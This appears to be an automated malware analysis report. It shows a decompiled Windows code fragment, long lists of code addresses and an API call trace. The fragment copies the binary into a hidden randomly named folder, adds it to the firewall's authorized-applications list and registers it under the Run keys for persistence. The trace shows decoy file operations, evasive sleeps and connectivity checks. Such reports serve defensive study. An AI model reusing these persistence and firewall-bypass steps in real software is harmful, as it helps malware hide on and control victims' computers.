									MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
									Sleep(0xfa0);
									DeleteFileA("3r38r38r838r838r388r838r83");
									_v4392 = _v4392 + 1;
								}
								goto L147;
							}
							Sleep(0x1f4);
							memset( &_v1052, 0, 0x208);
							ExpandEnvironmentStringsW( *(_t1394 + _v4348 * 4 - 0x1044),  &_v1052, 0x208);
							_t714 = rand();
							asm("cdq");
							_t716 = rand();
							asm("cdq");
							_t718 = rand();
							asm("cdq");
							wsprintfW( &_v3132, L"%ls\\%d%d%d",  &_v1052, _t718 % 0x7530 + 0x3e8, _t716 % 0x7530 + 0x3e8, _t714 % 0x7530 + 0x3e8);
							wsprintfW( &_v3948, L"%ls\\%ls",  &_v3132,  &_v2608);
							_t1408 = _t1408 + 0x34;
							if(CreateDirectoryW( &_v3132, 0) == 0) {
								L194:
								_v4348 = _v4348 + 1;
								continue;
							}
							Sleep(0x3e8);
							if(CopyFileW( &_v1884,  &_v3948, 0) == 0) {
								goto L194;
							}
							Sleep(0x3e8);
							wsprintfW( &_v2508, L"%ls:*:Enabled:%ls",  &_v3948,  &_v1284);
							_t1431 = _t1408 + 0x10;
							SetFileAttributesW( &_v3132, 7);
							SetFileAttributesW( &_v3948, 7);
							if(RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, 0xf003f,  &_v1888) == 0) {
								_t747 = wcslen( &_v2508);
								_t1431 = _t1431 + 4;
								_t437 = _t747 + 2; // 0x2
								RegSetValueExW(_v1888,  &_v3948, 0, 1,  &_v2508, _t747 + _t437);
								RegCloseKey(_v1888);
							}
							if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0xf003f,  &_v1888) == 0) {
								_t742 = wcslen( &_v3948);
								_t1431 = _t1431 + 4;
								RegSetValueExW(_v1888,  &_v1284, 0, 1,  &_v3948, _t742 + _t742 + 2);
								RegCloseKey(_v1888);
							}
							if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0xf003f,  &_v1888) == 0) {
								_t738 = wcslen( &_v3948);
								_t1431 = _t1431 + 4;
								_t453 = _t738 + 2; // 0x2
								RegSetValueExW(_v1888,  &_v1284, 0, 1,  &_v3948, _t738 + _t453);
								RegCloseKey(_v1888);
							}
							_t736 = E00AB2730( &_v3948);
							_t1408 = _t1431 + 4;
							if((_t736 & 0x000000ff) != 1) {
								goto L194;
							}
							ExitProcess(0);
						}
						goto L195;
					}
					ExitProcess(0);
				}
			}

0x00ab2ab8
0x00ab2ac4
0x00ab2aca
0x00ab2ad4
0x00ab2ade
0x00ab2af7
0x00ab2afd
0x00ab2b0a
0x00ab32b9
0x00ab32be
0x00ab32c6
0x00ab33ee
0x00ab33f7
0x00000000
0x00ab33f7
0x00ab32cc
0x00ab32e7
0x00ab32fd
0x00ab32e1
0x00ab32e1
0x00ab330a
0x00ab331d
0x00ab332a
0x00ab3331
0x00ab333e
0x00ab334e
0x00ab3360
0x00ab336b
0x00ab3378
0x00ab3383
0x00ab338e
0x00ab3399
0x00ab3399
0x00ab339f
0x00ab33ba
0x00ab33cb
0x00ab33d6
0x00ab33e6
0x00ab33b4
0x00ab33b4
0x00000000
0x00ab33ba
0x00ab2b15
0x00ab2b25
0x00ab2b30
0x00ab2b3b
0x00ab2b46
0x00ab2b56
0x00ab2b5c
0x00ab2b77
0x00ab2b91
0x00ab2b9c
0x00ab2bac
0x00ab2bb7
0x00ab2bc2
0x00ab2bcd
0x00ab2bd8
0x00ab2be8
0x00ab2bf3
0x00ab2bfe
0x00ab2b71
0x00ab2b71
0x00ab2c0e
0x00ab2c19
0x00ab2c24
0x00ab2c2f
0x00ab2c3f
0x00ab2c4a
0x00ab2c55
0x00ab2c6e
0x00ab2c79
0x00ab2c86
0x00ab2d94
0x00ab2d99
0x00ab2da4
0x00ab2db1
0x00ab2dbc
0x00ab2dcc
0x00ab2dd7
0x00ab2de6
0x00ab2df3
0x00ab2dfe
0x00ab2e0b
0x00ab2e1b
0x00ab2e21
0x00ab2e2b
0x00ab2e41
0x00ab2e51
0x00ab2e5c
0x00ab2e6c
0x00ab2e77
0x00ab2e82
0x00ab2e8d
0x00ab2ea0
0x00ab2eb9
0x00ab2ec6
0x00ab2ed1
0x00ab2ee1
0x00ab2eec
0x00ab2f0c
0x00ab2f19
0x00ab2f20
0x00ab2f2b
0x00ab2f36
0x00ab2f46
0x00ab2f56
0x00ab2f61
0x00ab2f6c
0x00ab2f6c
0x00ab2f79
0x00ab2f84
0x00ab2f84
0x00ab2f91
0x00ab2f9c
0x00ab2fa9
0x00ab2fb8
0x00ab2fc3
0x00ab2fd0
0x00ab2fdb
0x00ab2ff4
0x00ab3001
0x00ab3021
0x00ab302e
0x00ab3035
0x00ab3040
0x00ab3050
0x00ab305b
0x00ab3066
0x00ab3066
0x00ab3073
0x00ab307e
0x00ab3086
0x00ab3096
0x00ab30a1
0x00ab30ac
0x00ab30b7
0x00ab30b7
0x00ab30c4
0x00ab30c4
0x00ab2fa9
0x00ab30ca
0x00ab30d4
0x00ab30de
0x00ab30f9
0x00ab3106
0x00ab310d
0x00ab3118
0x00ab3128
0x00ab3133
0x00ab313e
0x00ab3149
0x00ab3158
0x00ab3158
0x00ab315e
0x00ab3170
0x00ab3177
0x00ab3182
0x00ab318d
0x00ab3198
0x00ab31a8
0x00ab31a8
0x00ab31bb
0x00ab31c8
0x00ab31d3
0x00ab31de
0x00ab31eb
0x00ab31fb
0x00ab320a
0x00ab3215
0x00ab3224
0x00ab322f
0x00ab323f
0x00ab324a
0x00ab3259
0x00ab3264
0x00ab326f
0x00ab326f
0x00ab3275
0x00ab3290
0x00ab32a1
0x00ab32b1
0x00ab328a
0x00ab328a
0x00000000
0x00ab3290
0x00ab2c91
0x00ab2ca1
0x00ab2cb1
0x00ab2cbc
0x00ab2cc7
0x00ab2cd2
0x00ab2cdd
0x00ab2cfd
0x00ab2d08
0x00ab2d15
0x00ab2d7c
0x00ab2d83
0x00ab2d8e
0x00000000
0x00ab2d8e
0x00ab2d17
0x00ab2d32
0x00ab2d43
0x00ab2d4e
0x00ab2d5e
0x00ab2d69
0x00ab2d74
0x00ab2d2c
0x00ab2d2c
0x00000000
0x00ab2d32
0x00ab3407
0x00ab340d
0x00ab3418
0x00ab3429
0x00ab342f
0x00ab342f
0x00ab3435
0x00ab343b
0x00ab3440
0x00ab3446
0x00ab344c
0x00ab3452
0x00ab3458
0x00ab345e
0x00ab3463
0x00ab3469
0x00ab346f
0x00ab3475
0x00ab347b
0x00ab3481
0x00ab3486
0x00ab348c
0x00ab3492
0x00ab34a8
0x00ab34aa
0x00ab34b4
0x00ab34be
0x00ab34c8
0x00ab34d2
0x00ab34dc
0x00ab34e6
0x00ab34f0
0x00ab34fa
0x00ab3504
0x00ab350e
0x00ab3518
0x00ab3522
0x00ab352c
0x00ab3536
0x00ab3540
0x00ab354a
0x00ab3554
0x00ab355a
0x00ab3560
0x00ab3565
0x00ab356b
0x00ab3571
0x00ab3577
0x00ab357d
0x00ab3583
0x00ab3589
0x00ab3590
0x00ab3596
0x00ab35ac
0x00ab35be
0x00ab35c0
0x00ab35d2
0x00ab35d4
0x00ab35e6
0x00ab35e8
0x00ab35f9
0x00ab35fb
0x00ab35fd
0x00ab3603
0x00ab3609
0x00ab360e
0x00ab3614
0x00ab361a
0x00ab3620
0x00ab3626
0x00ab362c
0x00ab3631
0x00ab3637
0x00ab363d
0x00ab3643
0x00ab3649
0x00ab364f
0x00ab3654
0x00ab365a
0x00ab3660
0x00ab3666
0x00ab366d
0x00ab3684
0x00ab3686
0x00ab3688
0x00ab3689
0x00ab368e
0x00ab3694
0x00ab369a
0x00ab36a0
0x00ab36a6
0x00ab36ac
0x00ab36b1
0x00ab36b7
0x00ab36bd
0x00ab36c3
0x00ab36c9
0x00ab36cf
0x00ab36d4
0x00ab36da
0x00ab36e0
0x00ab36e6
0x00ab36ec
0x00ab36f2
0x00ab36f7
0x00ab36fd
0x00ab3704
0x00ab370b
0x00ab3711
0x00ab3717
0x00ab371c
0x00ab3722
0x00ab3728
0x00ab372e
0x00ab3734
0x00ab373a
0x00ab373f
0x00ab3745
0x00ab374b
0x00ab3751
0x00ab3757
0x00ab375d
0x00ab3762
0x00ab3768
0x00ab376e
0x00ab3774
0x00ab377a
0x00ab3780
0x00ab3786
0x00ab379d
0x00ab37af
0x00ab37b1
0x00ab37b7
0x00ab37bd
0x00ab37c3
0x00ab37c9
0x00ab37cf
0x00ab37d6
0x00ab37dc
0x00ab37f2
0x00ab37f2
0x00ab37ff
0x00ab3805
0x00ab3816
0x00ab3820
0x00ab382a
0x00ab3834
0x00ab3840
0x00ab3846
0x00ab384c
0x00ab3852
0x00ab3858
0x00ab385e
0x00ab3864
0x00ab386a
0x00ab3870
0x00ab3876
0x00ab3880
0x00ab388a
0x00ab38a1
0x00ab38a9
0x00ab39bb
0x00ab39c2
0x00ab39c8
0x00ab39d5
0x00ab3e6e
0x00ab3e77
0x00000000
0x00ab3e77
0x00ab39e5
0x00ab39f0
0x00ab39fb
0x00ab3a0b
0x00ab3a16
0x00ab3a2f
0x00ab3a3a
0x00ab3a47
0x00ab3a4e
0x00ab3a6e
0x00ab3a7b
0x00ab3a82
0x00ab3a8d
0x00ab3a8d
0x00ab3a9a
0x00ab3aa5
0x00ab3aa5
0x00ab3ab2
0x00ab3ac5
0x00ab3ad1
0x00ab3ae1
0x00ab3ae1
0x00ab3af4
0x00ab3b01
0x00ab3b0f
0x00ab3b1f
0x00ab3b2c
0x00ab3b2c
0x00ab3b37
0x00ab3b47
0x00ab3b56
0x00ab3b66
0x00ab3b73
0x00ab3b7e
0x00ab3b8b
0x00ab3b91
0x00ab3b9b
0x00ab3bb1
0x00ab3bc1
0x00ab3bd1
0x00ab3be4
0x00ab3bfd
0x00ab3c0a
0x00ab3c11
0x00ab3c31
0x00ab3c3e
0x00ab3c45
0x00ab3c55
0x00ab3c60
0x00ab3c70
0x00ab3c70
0x00ab3c7d
0x00ab3c85
0x00ab3c85
0x00ab3c92
0x00ab3c9d
0x00ab3caa
0x00ab3cb7
0x00ab3cc2
0x00ab3cd2
0x00ab3ce1
0x00ab3cec
0x00ab3cf7
0x00ab3d10
0x00ab3d1d
0x00ab3d39
0x00ab3d46
0x00ab3d52
0x00ab3d52
0x00ab3d5f
0x00ab3d67
0x00ab3d77
0x00ab3d82
0x00ab3d8d
0x00ab3d8d
0x00ab3d9a
0x00ab3d9a
0x00ab3caa
0x00ab3da0
0x00ab3daa
0x00ab3db4
0x00ab3dcf
0x00ab3ddc
0x00ab3de8
0x00ab3df3
0x00ab3e02
0x00ab3e02
0x00ab3e08
0x00ab3e0a
0x00ab3e25
0x00ab3e3b
0x00ab3e4b
0x00ab3e56
0x00ab3e66
0x00ab3e1f
0x00ab3e1f
0x00000000
0x00ab3e25
0x00ab38b9
0x00ab38bf
0x00ab38da
0x00ab38f0
0x00ab38fb
0x00ab38d4
0x00ab38d4
0x00ab3908
0x00ab391b
0x00ab3928
0x00ab3934
0x00ab3946
0x00ab3956
0x00ab3961
0x00ab396c
0x00ab396c
0x00ab3972
0x00ab398d
0x00ab39a3
0x00ab39b3
0x00ab3987
0x00ab3987
0x00000000
0x00ab398d
0x00ab3e87
0x00ab3e9b
0x00ab3ea6
0x00ab3eac
0x00ab3eb5
0x00ab3ec8
0x00ab3ee1
0x00ab3ef1
0x00ab3efe
0x00ab3f08
0x00ab3f1a
0x00ab3f1f
0x00ab3f24
0x00ab4f44
0x00ab4f49
0x00ab4f64
0x00ab4f69
0x00ab4f72
0x00ab4f7a
0x00ab50e3
0x00ab50e8
0x00ab5103
0x00ab5108
0x00ab5111
0x00ab5119
0x00ab5126
0x00ab5135
0x00ab5144
0x00ab5153
0x00ab5162
0x00ab5171
0x00ab5180
0x00ab5185
0x00ab51a3
0x00ab51c4
0x00ab51e5
0x00ab5206
0x00ab5227
0x00ab5248
0x00ab5269
0x00ab5276
0x00ab5276
0x00ab5281
0x00ab529c
0x00ab52a1
0x00ab52aa
0x00ab52b2
0x00ab52bf
0x00ab52ce
0x00ab52dd
0x00ab52ec
0x00ab52fb
0x00ab530a
0x00ab5319
0x00ab531e
0x00ab533c
0x00ab535d
0x00ab537e
0x00ab539f
0x00ab53c0
0x00ab53e1
0x00ab5402
0x00ab540f
0x00ab540f
0x00ab541a
0x00ab542f
0x00ab543a
0x00ab544f
0x00ab545a
0x00ab5460
0x00ab5462
0x00ab5468
0x00ab5483
0x00ab5492
0x00ab5498
0x00ab54b3
0x00ab54be
0x00ab54ec
0x00ab550a
0x00ab550f
0x00ab5518
0x00ab5521
0x00ab5526
0x00ab5526
0x00ab54ad
0x00ab54ad
0x00ab547d
0x00ab547d
0x00ab5533
0x00ab5538
0x00ab554a
0x00ab554a
0x00ab5460
0x00ab4fa4
0x00ab4fbf
0x00ab4fc4
0x00ab4fcd
0x00ab4fd5
0x00ab4ff4
0x00ab4ff9
0x00ab5002
0x00ab5002
0x00ab501d
0x00ab5022
0x00ab502b
0x00ab5033
0x00ab5040
0x00ab504f
0x00ab505e
0x00ab5063
0x00ab5081
0x00ab50a2
0x00ab50c3
0x00ab50d0
0x00ab50d0
0x00ab50dd
0x00000000
0x00ab50dd
0x00ab3f2f
0x00ab3f35
0x00ab3f3f
0x00ab3f49
0x00ab3f68
0x00ab3f75
0x00ab440c
0x00ab4415
0x00000000
0x00ab4415
0x00ab3f80
0x00ab3f8b
0x00ab3f96
0x00ab3fa9
0x00ab3fb0
0x00ab3fc0
0x00ab3fcb
0x00ab3fcb
0x00ab3fde
0x00ab3feb
0x00ab3ff7
0x00ab4006
0x00ab4015
0x00ab4020
0x00ab4030
0x00ab403f
0x00ab4051
0x00ab405e
0x00ab405e
0x00ab4077
0x00ab4084
0x00ab40a0
0x00ab40ad
0x00ab40b4
0x00ab40bf
0x00ab40ca
0x00ab40ca
0x00ab40d7
0x00ab40e2
0x00ab40e2
0x00ab40ef
0x00ab40fa
0x00ab4109
0x00ab4119
0x00ab4128
0x00ab4133
0x00ab4140
0x00ab414b
0x00ab4158
0x00ab4165
0x00ab416b
0x00ab4175
0x00ab418b
0x00ab419b
0x00ab41a6
0x00ab41b9
0x00ab41c9
0x00ab41e2
0x00ab41ef
0x00ab420b
0x00ab4218
0x00ab421f
0x00ab422a
0x00ab4235
0x00ab4235
0x00ab4242
0x00ab424a
0x00ab424a
0x00ab4257
0x00ab4262
0x00ab426f
0x00ab427a
0x00ab4287
0x00ab4297
0x00ab42a6
0x00ab42b1
0x00ab42bc
0x00ab42d5
0x00ab42e2
0x00ab42fe
0x00ab430b
0x00ab4312
0x00ab431d
0x00ab432d
0x00ab4338
0x00ab4338
0x00ab4345
0x00ab4350
0x00ab4350
0x00ab435d
0x00ab4368
0x00ab4368
0x00ab426f
0x00ab436e
0x00ab4378
0x00ab4382
0x00ab439d
0x00ab43aa
0x00ab43b1
0x00ab43c0
0x00ab43c0
0x00ab43c6
0x00ab43c8
0x00ab43e3
0x00ab43f4
0x00ab4404
0x00ab43dd
0x00ab43dd
0x00000000
0x00ab43e3
0x00ab4425
0x00ab442b
0x00ab4446
0x00ab4458
0x00ab445e
0x00ab4468
0x00ab4472
0x00ab4491
0x00ab449e
0x00ab4b6e
0x00ab4b7b
0x00ab4c9e
0x00ab4ca7
0x00000000
0x00ab4ca7
0x00ab4b86
0x00ab4b8c
0x00ab4ba7
0x00ab4bbd
0x00ab4bc8
0x00ab4ba1
0x00ab4ba1
0x00ab4bd5
0x00ab4be8
0x00ab4bf5
0x00ab4bfc
0x00ab4c09
0x00ab4c16
0x00ab4c21
0x00ab4c31
0x00ab4c3c
0x00ab4c49
0x00ab4c54
0x00ab4c54
0x00ab4c5a
0x00ab4c75
0x00ab4c86
0x00ab4c96
0x00ab4c6f
0x00ab4c6f
0x00000000
0x00ab4c75
0x00ab44a9
0x00ab44b4
0x00ab44bf
0x00ab44ca
0x00ab44d5
0x00ab44e5
0x00ab44eb
0x00ab4506
0x00ab4517
0x00ab4527
0x00ab4537
0x00ab4542
0x00ab454d
0x00ab4500
0x00ab4500
0x00ab455a
0x00ab4565
0x00ab4570
0x00ab4580
0x00ab458b
0x00ab4596
0x00ab45af
0x00ab45ba
0x00ab45c7
0x00ab46ba
0x00ab46bf
0x00ab46ca
0x00ab46d7
0x00ab46e2
0x00ab46ef
0x00ab46fc
0x00ab470c
0x00ab4719
0x00ab4729
0x00ab472f
0x00ab4739
0x00ab474f
0x00ab475f
0x00ab476f
0x00ab477a
0x00ab478a
0x00ab479d
0x00ab47b6
0x00ab47c3
0x00ab47ce
0x00ab47de
0x00ab47fe
0x00ab480b
0x00ab4812
0x00ab481d
0x00ab482d
0x00ab4838
0x00ab4843
0x00ab4843
0x00ab4850
0x00ab485b
0x00ab485b
0x00ab4868
0x00ab4873
0x00ab4880
0x00ab4890
0x00ab489f
0x00ab48ac
0x00ab48b7
0x00ab48c2
0x00ab48db
0x00ab48e8
0x00ab4908
0x00ab4915
0x00ab491c
0x00ab492c
0x00ab4937
0x00ab4942
0x00ab4942
0x00ab494f
0x00ab495a
0x00ab4965
0x00ab4970
0x00ab4970
0x00ab497d
0x00ab497d
0x00ab4880
0x00ab4983
0x00ab498d
0x00ab4997
0x00ab49b2
0x00ab49bf
0x00ab49c6
0x00ab49d6
0x00ab49e1
0x00ab49ec
0x00ab49f7
0x00ab4a06
0x00ab4a06
0x00ab4a0c
0x00ab4a1b
0x00ab4a22
0x00ab4a2d
0x00ab4a38
0x00ab4a43
0x00ab4a53
0x00ab4a53
0x00ab4a66
0x00ab4a73
0x00ab4a7e
0x00ab4a89
0x00ab4a94
0x00ab4aa1
0x00ab4ab1
0x00ab4ac0
0x00ab4ad0
0x00ab4ae0
0x00ab4aeb
0x00ab4af8
0x00ab4b03
0x00ab4b03
0x00ab4b09
0x00ab4b24
0x00ab4b35
0x00ab4b40
0x00ab4b4b
0x00ab4b5b
0x00ab4b66
0x00ab4b1e
0x00ab4b1e
0x00000000
0x00ab4b24
0x00ab45d7
0x00ab45e2
0x00ab45ed
0x00ab45f8
0x00ab4603
0x00ab4623
0x00ab462e
0x00ab463b
0x00ab46a2
0x00ab46a9
0x00ab46b4
0x00000000
0x00ab46b4
0x00ab463d
0x00ab4658
0x00ab4669
0x00ab4674
0x00ab4684
0x00ab468f
0x00ab469a
0x00ab4652
0x00ab4652
0x00000000
0x00ab4658
0x00ab4cb7
0x00ab4ccb
0x00ab4ced
0x00ab4cf3
0x00ab4cf8
0x00ab4d07
0x00ab4d0c
0x00ab4d1b
0x00ab4d20
0x00ab4d42
0x00ab4d65
0x00ab4d6b
0x00ab4d7f
0x00ab4f3f
0x00ab4440
0x00000000
0x00ab4440
0x00ab4d8a
0x00ab4da8
0x00000000
0x00000000
0x00ab4db3
0x00ab4dd3
0x00ab4dd9
0x00ab4de5
0x00ab4df4
0x00ab4e1a
0x00ab4e23
0x00ab4e28
0x00ab4e2b
0x00ab4e49
0x00ab4e56
0x00ab4e56
0x00ab4e7c
0x00ab4e85
0x00ab4e8a
0x00ab4eab
0x00ab4eb8
0x00ab4eb8
0x00ab4ede
0x00ab4ee7
0x00ab4eec
0x00ab4eef
0x00ab4f0d
0x00ab4f1a
0x00ab4f1a
0x00ab4f27
0x00ab4f2c
0x00ab4f35
0x00000000
0x00000000
0x00ab4f39
0x00ab4f39
0x00000000
0x00ab4446
0x00ab381a
0x00ab381a

APIs

Sleep.KERNELBASE(000007D0,?,?,?,00AB574E,00000000,?,0000000A), ref: 00AB2AC4
FindWindowA.USER32 ref: 00AB2AF7
Sleep.KERNEL32(00000FA0), ref: 00AB2B15
MoveFileA.KERNEL32 ref: 00AB2B25
Sleep.KERNEL32(000003E8), ref: 00AB2B30
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB2B3B
Sleep.KERNEL32(00002328), ref: 00AB2B46
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 00AB2B56
MoveFileA.KERNEL32 ref: 00AB2B91
Sleep.KERNEL32(00000FA0), ref: 00AB2B9C
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 00AB2BAC
Sleep.KERNEL32(00000BB8), ref: 00AB2BB7
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB2BC2
Sleep.KERNEL32(000007D0), ref: 00AB2BCD
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB2BD8
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 00AB2BE8
Sleep.KERNEL32(00000FA0), ref: 00AB2BF3
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB2BFE
Sleep.KERNEL32(000003E8), ref: 00AB2C0E
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB2C19
Sleep.KERNEL32(00001770), ref: 00AB2C24
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB2C2F
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 00AB2C3F
Sleep.KERNEL32(00001388), ref: 00AB2C4A
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB2C55
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00AB2C68
DeleteFileW.KERNEL32(3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 00AB2C79
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB2C91
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 00AB2CA1
MoveFileA.KERNEL32 ref: 00AB2CB1
Sleep.KERNEL32(00001388), ref: 00AB2CBC
DeleteFileW.KERNEL32(3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 00AB2CC7
Sleep.KERNEL32(00000BB8), ref: 00AB2CD2
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB2CDD
InternetOpenUrlA.WININET(00000000,http://www.yandex.ru/,00000000,00000000,00000000,00000000), ref: 00AB2CF7
Sleep.KERNEL32(000007D0), ref: 00AB2D08
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB2D43
Sleep.KERNEL32(000007D0), ref: 00AB2D4E
MoveFileA.KERNEL32 ref: 00AB2D5E
Sleep.KERNEL32(00000FA0), ref: 00AB2D69
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB2D74
InternetCloseHandle.WININET(00000000), ref: 00AB2D83
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB2D8E
Sleep.KERNEL32(00001B58), ref: 00AB2D99
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB2DA4
InternetCloseHandle.WININET(00000000), ref: 00AB2DB1
Sleep.KERNEL32(00002710), ref: 00AB2DBC
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 00AB2DCC
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB2DD7
ShowWindow.USER32(00000000,00000001), ref: 00AB2DE6
SetForegroundWindow.USER32(00000000), ref: 00AB2DF3
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB2DFE
CloseWindow.USER32 ref: 00AB2E0B
MoveFileA.KERNEL32 ref: 00AB2E1B
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB2E5C
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 00AB2E6C
Sleep.KERNEL32(000007D0), ref: 00AB2E77
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB2E82
DeleteFileA.KERNEL32(4tt4t4wwt44t4tw4tw4wt4tw4t), ref: 00AB2E8D
FindWindowA.USER32 ref: 00AB2E9A
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00AB2EB3
Sleep.KERNEL32(00001F40), ref: 00AB2ED1
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 00AB2EE1
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB2EEC
InternetOpenUrlA.WININET(00000000,http://www.yandex.ru/,00000000,00000000,00000000,00000000), ref: 00AB2F06
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB2F20
Sleep.KERNEL32(00001388), ref: 00AB2F2B
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB2F36
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,nw55n5nww5n5nww5nw5n5n5n5n), ref: 00AB2F46
MoveFileA.KERNEL32 ref: 00AB2F56
Sleep.KERNEL32(00000FA0), ref: 00AB2F61
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB2F6C
InternetCloseHandle.WININET(00000000), ref: 00AB2F79
Sleep.KERNEL32(00000DAC), ref: 00AB2F84
InternetCloseHandle.WININET(00000000), ref: 00AB2F91
Sleep.KERNEL32(00001388), ref: 00AB2F9C
ShowWindow.USER32(00000000,00000000), ref: 00AB2FB8
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB2FC3
SetForegroundWindow.USER32(00000000), ref: 00AB2FD0
Sleep.KERNEL32(00000DAC), ref: 00AB2FDB
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00AB2FEE
InternetOpenUrlA.WININET(00000000,http://www.yandex.ru/,00000000,00000000,00000000,00000000), ref: 00AB301B
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB3035
Sleep.KERNEL32(00001388), ref: 00AB3040
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 00AB3050
Sleep.KERNEL32(00000BB8), ref: 00AB305B
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB3066
InternetCloseHandle.WININET(00000000), ref: 00AB3073
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB307E
Sleep.KERNEL32(00000064), ref: 00AB3086
MoveFileA.KERNEL32 ref: 00AB3096
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB30A1
DeleteFileA.KERNEL32(4tt4t4wwt44t4tw4tw4wt4tw4t), ref: 00AB30AC
Sleep.KERNEL32(000007D0), ref: 00AB30B7
InternetCloseHandle.WININET(00000000), ref: 00AB30C4
FindWindowA.USER32 ref: 00AB30F3
Sleep.KERNEL32(000007D0), ref: 00AB310D
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB3118
MoveFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e,nw55n5nww5n5nww5nw5n5n5n5n), ref: 00AB3128
Sleep.KERNEL32(00001388), ref: 00AB3133
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB313E
Sleep.KERNEL32(00001388), ref: 00AB3149
PathFileExistsA.SHLWAPI(2uu5uii55i5i25i52i5ii2525i5i25i), ref: 00AB3168
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB3177
Sleep.KERNEL32(00000FA0), ref: 00AB3182
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB318D
Sleep.KERNEL32(000001F4), ref: 00AB3198
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 00AB31A8
FindWindowA.USER32 ref: 00AB31B5
Sleep.KERNEL32(00001388), ref: 00AB31D3
DeleteFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB31DE
SetForegroundWindow.USER32(00000000), ref: 00AB31EB
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 00AB31FB
ShowWindow.USER32(00000000,00000001), ref: 00AB320A
Sleep.KERNEL32(000001F4), ref: 00AB3215
ShowWindow.USER32(00000000,00000001), ref: 00AB3224
Sleep.KERNEL32(00003A98), ref: 00AB322F
MoveFileA.KERNEL32 ref: 00AB323F
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB324A
ShowWindow.USER32(00000000,00000000), ref: 00AB3259
